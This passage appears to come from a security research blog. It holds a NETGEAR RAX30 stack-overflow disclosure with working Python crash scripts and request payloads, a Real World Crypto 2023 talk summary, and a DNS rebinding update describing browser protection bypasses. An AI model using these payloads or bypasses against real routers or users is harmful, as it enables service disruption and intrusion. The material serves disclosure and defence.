CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDD
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#A
Content-Length: 1
Host: 192.168.2.1:5043

A

Python Proof of Concept Script

The following proof of concept script (soap_protocol_overflow.py) can be executed to trigger the protocol stack overflow.

#!/usr/bin/env python3

import argparse
import requests
import urllib3
import ssl
import socket

def overflowHTTPProtocol(hostname, port, payload):
    request = """POST /soap/server_sa/ """+payload+"""
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#A
Content-Length: 1
Host: """+hostname+""":"""+str(port)+"""

A"""

    # Create SSL context
    cxt = ssl.create_default_context()
    cxt.check_hostname = False
    cxt.verify_mode = ssl.CERT_NONE

    # HTTPS Request
    response = b""
    with socket.create_connection((args.domain, args.port)) as sock:
        with cxt.wrap_socket(sock, server_hostname=args.domain) as ssock:
            ssock.send(request.encode())
            while True:
                data = ssock.recv(2048)
                if len(data) <= 0:
                    break
                response += data

    return response

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash the soap_serverd binary on NETGEAR RAX30 router with a protocol buffer overflow.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    # Trigger Protocol Overflow
    payload = ('A' * 2048) + ('B' * 2048) + ('C' * 2048) + ('D' * 4)

    print('Sending payload...')
    overflowHTTPProtocol(args.domain, args.port, payload)

    # Check we have crashed the SOAP service
    try:
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data='A', headers={
            'User-Agent': 'ksoap2-android/2.6.0+',
            'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
        }, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Connection refused' in str(e) or 'Connection aborted' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))

On execution, the payload will be sent to the SOAP service and cause it to crash on vulnerable firmware versions.

└─$ python3 soap_protocol_overflow.py --domain 192.168.1.1 --port 5043
Sending payload...
Payload crashed server!

Patch v1.0.10.94

The patch reduces the buffer sizes of the method, path and protocol buffers. It restricts the total read size of the fgetsFile function to 2048 bytes. It then limits the sscanf buffer copy size to 511 bytes for each of the 512 byte buffers.

int handle_soapRequest(char *ip)
{
    ...
    char line [2048];
    char method [512];
    char path [512];
    char protocol [512];
    char soapAction [2048];
    char body [2048];
    ...
    memset(line, 0, 2048);
    memset(method, 0, 512);
    memset(path, 0, 512);
    memset(protocol, 0, 512);
    ...
    int readCount = _fgetsFile(line, 2048);
    ...
    int iVar1 = __isoc99_sscanf(line, "%511[^ ] %511[^ ] %511[^ ]", method, path, protocol);
    ...
}

PSV-2023-0012 – SOAP Parameters Stack Buffer Overflow

Analysis

The loop which parses SOAP parameters in soap_action (0x00016f78) [21] overflows the RequestArg requestArgs [16]; variable [22] when more than 16 parameters are provided as there is no check on the number of parameters [23]. The overwrite however is in the format of a RequestArg [24] struct which means that the data being overwrote is pointers to the controllable parameters.

struct RequestArg // <--- [24]
{
    char* key;
    char* value;
    int unk1;
};

void soap_action(int param_1, char *action, char *body, char *ip)
{
    ...
    RequestArg requestArgs [16];         // <--- [22]
    RequestArg *args = requestArgs;
    memset(args, 0, 0xc0);
    ...
    strcpy(bodyQuery, ":Body>");
    bodyParser = strstr(body, bodyQuery);
    ...
    bodyParser = bodyParser + 1;
    ...
    int argc = 0;
    do {                                 // <--- [21]
        ...
        args->key = bodyParser;
        args->value = code;
        argc = argc + 1;
        args = args + 1;
        //                                  <--- [23] No check on arg count (argc)
    } while (pcVar2[1] != '\0');
    ...
}

HTTP Request

The following body payload containing many XML parameters triggers the requestArgs stack variable overflow:

POST /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#A
Content-Length: 1930
Host: 192.168.2.1:5043

<v:Body><n0:GetInfo><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a><a>b</a></n0:GetInfo></v:Body>

Python Proof of Concept Script

The following proof of concept script (soap_parameters_overflow.py) can be executed to trigger the parameter stack overflow.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash soap_serverd binary on NETGEAR RAX30 router with an XML parameters overflow.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    # Trigger XML parameter overflow
    parameters = '<a>b</a>' * 236
    body = '<v:Body><n0:GetInfo>' + parameters + '</n0:GetInfo></v:Body>'
    print('Sending payload...')
    requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data=body, headers={
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
    }, verify=False)

    # Check we have crashed the SOAP service
    try:
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data='A', headers={
            'User-Agent': 'ksoap2-android/2.6.0+',
            'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
        }, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Connection refused' in str(e) or 'Connection aborted' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))

On execution, the payload will be sent to the SOAP service and cause it to crash on vulnerable firmware versions.

└─$ python3 soap_parameters_overflow.py --domain 192.168.1.1 --port 5043
Sending payload...
Payload crashed server!

Patch v1.0.10.94

This vulnerability was patched by adding a bounds check within the loop [1], causing it to exit the loop when the request argument count reaches 16 to prevent the overflow.

void soap_action(int param_1, char *action, char *body, char *ip)
{
    ...
    RequestArg requestArgs [16];
    RequestArg *args = requestArgs;
    memset(args, 0, 0xc0);
    ...
    strcpy(bodyQuery, ":Body>");
    bodyParser = strstr(body, bodyQuery);
    ...
    bodyParser = bodyParser + 1;
    ...
    int argc = 0;
    while (bodyParser = strchr(pcVar3 + 1,0x3c), bodyParser != (char *)0x0)
    {
        ...
        argc = argc + 1;
        args->key = bodyParser;
        args->value = code;
        if ((pcVar3[1] == '\0') || (args = args + 1, argc == 16)) break; // [1] - argc bounds check
    }
    ...
}

Conclusion

Overall, the security posture of custom binaries built by NETGEAR contained many vulnerabilities, largely due to the widespread usage of insecure C functions such as strcpy, strcat, sprintf, or from off-by-one errors. However, the majority of the binaries on the NETGEAR router were compiled with many protections in place, including stack canaries, non-executable stack (NX), position-independent code (PIE) and address layout randomization (ASLR) enabled. These protections made many of the vulnerabilities identified difficult to exploit on their own.

Real World Cryptography Conference 2023 – Part I

10 May 2023 at 20:36

The annual Real World Cryptography Conference organized by the IACR recently took place in Tokyo, Japan. On top of 3 days of excellent talks, RWC was preceded by the 2nd annual FHE.org Conference and the Real World Post-Quantum Cryptography Workshop and followed by the High Assurance Crypto Software Workshop.

Nearly all of NCC Group’s Cryptography Services team was in attendance this year, with those that could not make it attending remotely. Several of our members also participated in the co-located FHE.org, RWPQC, and HACS events. Some of our favorite talks and takeaways are summarized here, with more forthcoming in a future post.

  1. Real World Post-Quantum Cryptography (RWPQC)
  2. TLS-Anvil: Adapting Combinatorial Testing for TLS Libraries
  3. How We Broke a Fifth-Order Masked Kyber Implementation by Copy-Paste
  4. WhatsApp End-to-End Encrypted Backups
  5. tlock: Practical Timelock Encryption Based on Threshold BLS
  6. Ask Your Cryptographer if Context-Committing AEAD Is Right for You

Real World Post-Quantum Cryptography (RWPQC)

The RWPQC workshop was a co-located event held the day before Real World Crypto in Tokyo. The workshop consisted of a mix of invited talks and roundtable discussions on various real-world challenges facing post-quantum cryptography.

The first invited talk was an update from NIST on the PQC standardization process, which discussed the timeline for the draft standards as well as round 4 of the PQC process and the new on-ramp for signature schemes. This was followed by short “Lessons Learned” talks from each of the four selected candidates. Multiple “Lessons Learned” talks discussed problems with the incentive structure of the NIST PQC process, and possible ways of improving the consistency of the cryptanalysis of proposed schemes in the future. Vadim Lyubashevsky ended his short discussion on Dilithium mentioning the “bystander effect” and the complications of producing the NIST submissions with tight deadlines and big teams, and speculated on the effectiveness of small teams.

In the next invited talk, Douglas Stebila provided an update about the PQC standardization efforts at the IETF, where he described the varied efforts to integrate the soon-to-be-standardized algorithms into the various protocols maintained by the IETF, and highlighted the amount of work still left for practical PQC usage in many protocols. There was also an update from ANSSI, a French organization responsible for information systems security in France, which provided an overview of their migration recommendations, based on their experiences with industry vendors. For ANSSI, the focus of PQ integration was on the proper development of hybrid cryptography, and with their firm stance of the subject it seems many other organizations will follow this. In the final invited talk of the day, Vadim Lyubashevsky wrapped up the workshop with a talk about the strategies and current state of creating efficient lattice-based zero-knowledge proofs.

The invited talks were interspersed with roundtable discussions, which provided a more free-form discussion on various PQC-related topics. There were three roundtable discussions. The first, about “Implementation and side channels”, brought experts from industry and academia together to discuss challenges in side-channel proofing PQC algorithms. This panel discussed the need for side-channel protections at both the hardware and software level, and highlighted the importance of hardware and software experts working together to ensure that one’s hard work could not be bypassed by a security flaw from the other side. The second, an “Industry side discussion”, featured members of various companies who discussed the challenges of the PQC migration in their respective fields. This discussion tied in to the invited talks on the migration efforts at the IETF and ANSSI, and focused on the large amount of work still left to do in the PQC migration. Additionally, the discussion brought up that novel classical primitives still being invented today only add to the pile of work necessary for the PQC migration, and highlighted the need for more flexible quantum-safe constructions.

The last panel was focused on the “Current state of cryptanalysis” and brought together experts from all fields of post-quantum cryptography to discuss their thoughts on current and future state of cryptanalysis and security of various post-quantum primitives. In particular, the panel members included Ward Buellens, who spoke about breaking Rainbow and the future of multivariate cryptography, and Chloe Martindale, who discussed the recent break of SIKE and future works in isogeny cryptography and cryptanalysis. The other panel members discussed lattice, code and hash-based primitives, which were generally believed to remain secure, although it was highlighted that care must be taken when instantiating them, as (accidental or otherwise) deviations from best practices can be disastrous.

The first RWPQC workshop was a great success and generated many useful discussions across industry and academia. While there is a lot of work still needed before quantum-safe cryptography can be used everywhere, this workshop highlighted the many people currently working towards this goal. Looking forward to seeing the progress at future RWPQC workshops!

Elena Bakos Lang and Giacomo Pope

TLS-Anvil: Adapting Combinatorial Testing for TLS Libraries

In this talk, Marcel Maehren presented TLS-Anvil, a TLS testing tool developed by researchers from Ruhr University Bochum and Paderborn University in Germany (the full list of authors is available on the research paper) and recently presented at USENIX Security 2022.

The size and complexity of the TLS protocol has made it difficult to systematically test implementations and validate their conformance to the many governing RFCs. Specifically, the different parameters that can be negotiated strongly impact the ability to test implementations. Some of the requirements only apply to certain ciphersuites, while other ones are invariant among all negotiated parameters. One example Marcel gave of the latter is the following requirement:

The receiver MUST check [the] padding and MUST use the bad_record_mac alert to indicate padding errors.

This requirement should be met irrespective of the key exchange algorithm, signature algorithm, or specific block cipher choice.

However, the total number of ciphersuites and parameter combinations makes it close to impossible to specify tests for each of these individual requirements. Additionally, some other factors increase the complexity of systematic testing; TLS implementations are not required to support all algorithms and some specific parameter values are not allowed to be combined (such as a ciphersuite using RSA for signatures but using an ECDSA server certificate). TLS-Anvil uses a combinatorial approach called t-way testing which makes it possible to efficiently test many combinations of TLS parameters. In total, the tool defines 408 test templates and was tested on 13 commonly used TLS implementations, such as OpenSSL, mbed TLS, and NSS.

The tool uncovered over 200 RFC violations in these different libraries, including 3 exploitable vulnerabilities:

  • a padding oracle in the MatrixSSL Client due to a segmentation fault triggered by the use of HMAC-SHA256-CBC, because of an incorrect initialization of SHA256;
  • a DoS in the MatrixSSL Client, triggered when sending Server Hello messages with contradicting length fields;
  • and an authentication bypass for wolfSSL in TLS 1.3, where an empty Certificate message resulted in wolfSSL ignoring the subsequent Certificate Verify message.

Marcel concluded his presentation by highlighting some interesting future work, such as using a similar approach to test other protocols (like QUIC).

– Paul Bottinelli

How We Broke a Fifth-Order Masked Kyber Implementation by Copy-Paste

In the first presentation of the PQC track, Elena Dubrova presented work done in collaboration with Kalle Ngo and Joel Gartner involving power side-channel attacks on the CRYSTALS-Kyber algorithm using deep learning techniques. This algorithm was recently selected by NIST for standardization for post-quantum public-key encryption and key-establishment. Here, masking refers to a countermeasure involving splitting a secret into multiple partially-randomized shares to obfuscate the underlying arithmetic behavior of the cryptographic algorithms (and fifth-order refers to the secret split five times).

The central idea of the work, performed with power measurement traces from an ARM Cortex-M4 MCU, involved a new neural network training technique called recursive learning (colloquially: copy-paste). This technique involves copying weights from an existing working model targeting less masking into a new model targeting more masking. Thus, a first order solution (which was presented in 2021) is used to bootstrap a second order solution and so forth. This is a particularly intriguing use of transfer learning.

Deep learning is able to utilize very noisy traces for training, and surprisingly few traces for the actual attack. In this work, 30k training traces were used (on code compiled with -O3), and weights were cut-pasted from one model to the next. In the end, the probability of recovering a message was over 99% with only 20 attack traces. When constrained to 4 test traces, the probability remained above 96%. One of the reasons this talk was so interesting is that there seems no simple, low-cost and effective countermeasures that can be realistically taken to prevent these power side-channel attacks.

Eric Schorn

WhatsApp End-to-End Encrypted Backups

Kevin Lewi discussed the implementation of WhatsApp End-to-End Encrypted Backups in Real World Crypto 2023 session on “Building and Breaking Secure Systems”.

Kevin first explained the motivation for this service. When a message is end-to-end encrypted (E2EE), only the intended sender and recipient of a given message can decrypt it. Cleartext backup of messages to the cloud was at odds with the desired goal of end-to-end encryption of messages. Specifically, Kevin noted that cloud providers can, and did access user backups of plaintext messages in the past.

Users had to make the difficult choice of enabling or disabling backups at the cost of either lower security assurances, or not recovering their lost messages (if users misplaced their phones for instance), which Kevin describes as a “natural tension between usability, and privacy”.

Kevin then proceeded to describe the solution implemented by WhatsApp, and progressively available to users starting at the end of 2021, to address this problem. Users can either write down their backup encryption keys somewhere safe or set a memorable password to gate access to their secret backup encryption key, with the system enforcing a maximum password entry attempt counter. The former use case is probably targeted at the more tech savvy users; the presentation was focused on the latter use case, which aims to strike a balance between security, and usability for most users. In December 2022, 100 million users had enabled encrypted backup according to WhatsApp.

Kevin explained that there are three parties involved in running the WhatsApp End-to-End Encrypted Backups protocol: WhatsApp users, the cloud providers storing the users’ encrypted backups, and the key vaults managed by WhatsApp. The details of the privacy solution integrating these parties are complex and are sure to interest an audience with varied interests. Briefly, and to enumerate some of the salient aspects of the solution, the architecture is underpinned by hardware security modules (HSM) to protect user’s keys, employs the OPAQUE protocol, a password-authenticated key protocol, and Merkle trees to protect the integrity of sensitive data. Kevin’s presentation provides a good overview of these components, and how they interact with each other.

For those who want to know more, WhatsApp has published a security white paper on the same topic in 2021. NCC Group Cryptography Services team is not foreign to the subject at hand; the team performed a security assessment of several aspects of the solution in 2021 and published reports detailing our findings on both OPAQUE and its use in WhatsApp’s encrypted backup solution.

Gérald Doussot

tlock: Practical Timelock Encryption Based on Threshold BLS

Yolan Romailler, from the drand project, opened the Advanced Encryption session with a presentation on time-lock encryption, its use-cases as a building block, and a demo. A ciphertext that is time-lock encrypted can only be decrypted at a specified future that is set during encryption. Time lock encryption as a mechanism to withhold information until a specified time, can have many applications. As Yolan put it, instead of using the usual encryption key, the decryptor uses the time passed to decrypt the ciphertext. Besides sealed-bid auctions and responsible disclosures, or even ransomware that threatens to release data if payment is not received before a deadline (which would be much nicer than the ransomware we have right now, as Yolan said!), time lock encryption can be a solution to Maximal Extractable Value (MEV) and front-running issues in the blockchain space.

Currently, there are 2 approaches to time-lock encryption. The first, a puzzle-based approach, is to require a chain of computations that will delay decryption by at least the desired time difference. These types of schemes have proven to be fragile against a motivated attacker that invests in application-specific integrated circuits. The second, an agent-based approach, is to have a trusted agent that releases the decryption key at the specified time. This work chooses the later approach, an agent-based publicly decryptable time-lock encryption and replaces the trusted agent with a network that runs threshold BLS at constant intervals (more accurately referred to as rounds). An unchained time-lock scheme also allows for the ciphertext to be created and published before the decryption key is released at the specified time and is more aligned with the use-cases that were mentioned.

The referenced pre-print paper reformulates Boneh and Franklin’s Identity Based Encryption (IBE) to construct a Time Lock Encryption scheme. Perhaps this quote from the abstract summarizes it the best: “At present this threshold network broadcasts BLS signatures over each round number, equivalent to the current time interval, and as such can be considered a decentralised key holder periodically publishing private keys for the BF-IBE where identities are the round numbers”. At decryption time, this signature (more accurately the private key) is used to decrypt the symmetric encryption key that was used to encrypt the plaintext, which in turn is used to decrypt the ciphertext.

Towards the end of his presentation, Yolan mentioned that the implementation is open-source and utilizes age, an open-source tool that they use to encrypt the plaintext (of any size) with a symmetric key which they wrap and encrypt with IBE. The slides also included a QR code to a live webpage where anyone can encrypt their messages to the future they desire; it even includes a vulnerability report tab that makes responsible disclosure easier than ever!

Parnian Alimi

Ask Your Cryptographer if Context-Committing AEAD Is Right for You

Sanketh Menda closed out the technical presentations with his talk Ask Your Cryptographer if Context-Committing AEAD Is Right for You (slides). This work is a natural extension of previous efforts by some of the same authors investigating the implications of commonly used Authenticated Encryption with Associated Data (AEAD) schemes and the fact that they do not provide key commitment. In short, an attacker can produce a ciphertext and authentication tag such that the ciphertext will decrypt correctly under two different keys known to the attacker. Without key commitment, correct decryption under AES-GCM, for example, does not guarantee that you are in possession of the only key that can decrypt said ciphertext without error. The lack of key commitment has been used to attack real world deployments that implicitly rely on such an assumption. Sanketh’s presentation argued that key commitment alone may not be a sufficient property, and the community should aim to provide modes of operation that are context committing.

Attacks on key commitment focus on finding two keys such that that a fixed ciphertext, associated data, and nonce will correctly decrypt under both keys. However, more general attacks may apply with one or both of the associated data and nonce are not required to be fixed. A scheme that provides key commitment may still be vulnerable to an attack where there nonce or associated data are controlled by the attacker and a second valid tuple of ciphertext data can be produced. Therefore, one must commit to the entire “context” of the AEAD, and not just the key and authentication tag. Generic workarounds for key commitment exist, such as expanding the ciphertext to include a hash of the context, or to add additional fixed-value padding to plaintexts. But these solutions are not sufficient for context commitment without further modification.

Attacks targeting a lack of context commitment are theoretical at this point, but the presentation argues they are worth considering when designing new modes of block cipher operation. To this end, the talk concludes with a brief overview of the newly proposed OCH mode of operation, a variant of OCB that has been modified to provide context commitment. The approach provides a ciphertext that is of optimal length, and is maximally parallelizable, with all the features expected of a modern AEAD mode of operation. Given the minimal performance overhead to provide full context commitment over just key commitment, there is a compelling argument to target this stronger property when standardizing new modes of operation. I look forward to the full description of OCH mode, which should be appearing on ePrint soon.

Kevin Henry

State of DNS Rebinding in 2023

27 April 2023 at 01:01

Different forms of DNS rebinding attacks have been described as far back as 1996 for Java Applets and 2002 for JavaScript (Quick-Swap). It has been four years since our State of DNS Rebinding presentation in 2019 at DEF CON 27 (slides), where we introduced our DNS rebinding attack framework Singularity of Origin. In 2020, we studied the impact of DNS over HTTPS (DoH) on DNS rebinding attacks.

This update documents the state of DNS rebinding for April 2023. We describe Local Network Access, a new draft W3C specification currently implemented in some browsers that aims to prevent DNS rebinding, and show two potential ways to bypass these restrictions.

We also discuss the effects of WebRTC IP address leak mitigation, and DNS Bit 0x20 on DNS rebinding attacks.

Local Network Access

Local Network Access (previously called Private Network Access or CORS-RFC1918) is a W3C draft specification intended to mitigate the risks of unintentional exposure of web services on a client’s internal network. It does this by segmenting address ranges into different address spaces, and will behave differently depending upon the origin of the request. If the request is to a more private address space than the origin, it will first perform a CORS Preflight request to the host, allowing the host to perform access control.

While this might be a draft standard, it has already been implemented in Chrome and some derived browsers (e.g. Edge).

Local Network Access Address Spaces

The specification defines the following three broad IP address spaces:

  • loopback: The loopback address space contains the local host only (127.0.0.0/8, ::1/128).
  • local: The local address space contains addresses that are reachable only within the current network (e.g., 10.0.0.0/8, 100.64.0.0/10, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, fc00::/7, fe80::/10).
  • public: The public address space contains all other addresses.

Local Network Requests

The concept of a local network request is defined as follows (defined in “2.2. Local Network Request” of the specification):

A request is a local network request if request’s current URL’s host maps to an IP address whose IP address space is less public than request’s policy container’s IP address space.

This prevents the following two conditions:

  1. Network access to the loopback address space from an origin that is either in the local or public address space. This is because loopback is less public than the local or public address space.
  2. Network access to the local address space from an origin that is in the public address space. This is because local is less public than the public address space.

CORS Preflight

Access to less public networks will generate a CORS preflight request. The Local Network Access specification defines the following two additional CORS headers:

  • The Access-Control-Request-Local-Network client request header indicates that the request is a local network request
  • The Access-Control-Allow-Local-Network server response header indicates that a resource can be safely shared with external networks

Let’s walk through an example scenario. An attacker entices a home user to browse to the attacker’s web site at attacker.com. The attacker’s malicious JavaScript triggers a request to the victim’s local router (router.local) trying to modify the DNS settings. As the request to router.local is more private than the attacker’s host in the public address space, the browser will initiate a CORS preflight request:

OPTIONS /set_dns?... HTTP/1.1
Host: router.local
Access-Control-Request-Method: GET
Access-Control-Request-Local-Network: true
Origin: https://attacker.com
...

Note the request header Access-Control-Request-Local-Network: true indicating to the router that this request is a local network request. If the router does not understand this request and does not send a valid response, the browser will block access to router.local. If the router wants to allow access from external networks, the router will return the following CORS preflight response:

HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: https://public.example.com
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Allow-Local-Network: true
Content-Length: 0
...

Note the Access-Control-Allow-Local-Network: true notifying the browser that the router allows external network access.

Local Network Access Bypasses

Now that we have a good foundational understanding of Local Network Access, we can talk about the two known ways to bypass it.

Local Network Access Bypass using 0.0.0.0

What is the 0.0.0.0 IP address? According to Wikipedia, “0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target”. Nevertheless, using 0.0.0.0 allows us to access the localhost on Linux and macOS systems.

During our initial research of DNS rebinding attacks, we documented this attack vector allowing DNS rebinding protection bypasses.

Using the IP address 0.0.0.0 also bypasses local network access protections in Chrome (and Edge). We filed a Chromium bug report in February 2022; the issue can be tracked in Chromium bug 1300021.

This allows us to perform DNS rebinding attacks targeting services listening on the localhost of Linux and macOS systems in Chrome, in approximately 3 seconds.

Local Network Access Bypass using a Router’s Public IP Address

In 2010, Craig Heffner discovered and developed a DNS rebinding technique, covered during our DEF CON 27 presentation, to exploit the weak host model, which can be used to bypass Chrome’s local network access protection. In this bypass, we access an internal router’s web interface (e.g. WiFi router) through the public IP address instead of the internal (private) IP address.

Most WiFi routers allow access to their management web interface only through the internal interface using the private IP address to prevent access from the Internet. As the router usually has a public IP address assigned, some routers allow access to the web interface through the public IP address if the access comes from the internal network interface (Martian packet).

This allows us to perform DNS rebinding attacks targeting the public IP address where local network access does not apply. We have successfully tested DNS rebinding in Chrome targeting a home router’s public IP address. The attack works particularly well with Netgear routers.

Local Network Access Affects Singularity’s JavaScript Port Scanner

Singularity includes a browser based JavaScript port scanner to discover HTTP services accessible from the victim’s host, including internal networks, and to launch DNS rebinding attacks in an automated manner. The port scanner is implemented using the JavaScript Fetch API. If a Fetch request does not return an error, or does not timeout, the port is determined as being accessible (open and not firewalled), and a candidate for DNS rebinding.

Local network access blocks Fetch requests if the target is less public than the request’s address space, as explained above. This prevents the port scanning of loopback and local direct IP address spaces in Chrome based on the Fetch API. While this affects the port scanner when using Chrome, the scanner now only returns ports that we can rebind to; this means that the port scanner is still well suited for its purpose of identifying potentially exploitable services using DNS rebinding. The local network access Chrome bypass using the IP address 0.0.0.0 also works for port scanning, and permits attackers to (indirectly) access services bound to the victim host internal network interfaces. Note that the JavaScript port scanner still works in non-Chrome browsers such as Firefox and Safari.

Full HTTP service enumeration (including services that are not exploitable using DNS rebinding) in Chrome is still possible despite local network access using techniques exploiting timing side channel leaks, such as implemented in Nikolai Tschacher’s port scanner.

WebRTC Leaking the Local IP Address

Web Real-Time Communication (WebRTC) allows browsers to manage real-time peer-to-peer connections with the websites they visit. WebRTC enables voice and video communication to work in web pages, without the need of extensions or other additional software.

Previous implementations of WebRTC in browsers accidentally exposed a user’s local IP address, and associated network range. The local IP address is the client’s IP address in the private home, or corporate network. These are commonly private network IP addresses behind a NAT gateway.

Knowing the local IP address allows attackers to perform targeted DNS rebinding attacks without the need to know or guess the victim’s network IP range. Singularity includes IP address and network range detection functionality by abusing WebRTC in the attack automation feature as well as the port scan functionality.

Chrome, Edge, Firefox, and Safari now all obfuscate the private IP addresses of endpoints to prevent the leak during the ICE candidate gathering. Singularity can therefore no longer discover the victim’s local IP address in recent browsers. The Singularity attack framework can use the local IP address leak during its IP address scan to improve the efficiency of automated DNS rebinding attacks for older browsers. For recent browsers, automated DNS rebinding attacks still work, but may require an attacker to know or guess the victim’s private IP address range, or it will take longer to identify vulnerable targets within that range. Note that this does not affect the detection, and exploitation of vulnerable services bound to 0.0.0.0, as explained in the previous section.

DNS Bit 0x20

Since around December 2022, we noticed that some DNS rebinding attacks were failing randomly. By looking at the log files of the Singularity attack framework we noticed DNS queries that contained random capitalization in the DNS name.

For example, we saw DNS requests such as the following:

2023/01/05 10:44:08 DNS: Received A query: S-35.185.206.165-127.0.0.1-1672656847789-Rr-e.d.ReBInD.IT. from: 172.253.2.2:28060
2023/01/05 10:44:08 DNS: Parsed query:  {    }, error: cannot find start tag in DNS query

2023/01/02 10:54:08 DNS: Received A query: S-35.185.206.165-127.0.0.1-1672656848109-rr-e.d.REBInd.It. from: 172.253.2.2:34138
2023/01/02 10:54:08 DNS: Parsed query:  {    }, error: cannot find start tag in DNS query

